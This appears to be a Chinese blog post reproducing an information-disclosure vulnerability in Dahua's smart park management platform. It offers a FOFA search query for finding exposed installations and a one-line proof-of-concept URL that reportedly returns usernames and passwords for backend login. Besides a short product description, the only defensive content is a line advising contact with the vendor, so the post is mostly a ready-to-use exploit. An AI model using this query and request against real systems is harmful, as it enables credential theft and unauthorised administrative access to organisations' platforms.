【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

Nx01 产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

Nx02 漏洞描述

大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC:

复制代码
/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
Hiyajo pray4 分钟前
SDN 访问控制性能调优方法
服务器·网络·网络安全
初晴融雪-快雪时晴9 分钟前
网络硬件全景梳理:从光纤到手机,一张网是如何连接的?
网络·智能手机·智能路由器
辣椒思密达1 小时前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro
huainingning1 小时前
交换机通过ftp下载文件或者传输文件到ftp服务器
运维·服务器·网络
小池先生3 小时前
Windows服务器如何备份
运维·服务器
花生了什么事o3 小时前
DNS:把域名翻译成 IP 的层级查询机制
网络·网络协议·tcp/ip
satadriver4 小时前
手工加载API函数
安全
SLD_Allen4 小时前
Purple Llama:Meta开源的LLM安全“紫队”工具箱
安全·开源·llama
Sirius Wu4 小时前
OpenClaw Cron安全约束完整详解
人工智能·安全·aigc
数据知道4 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划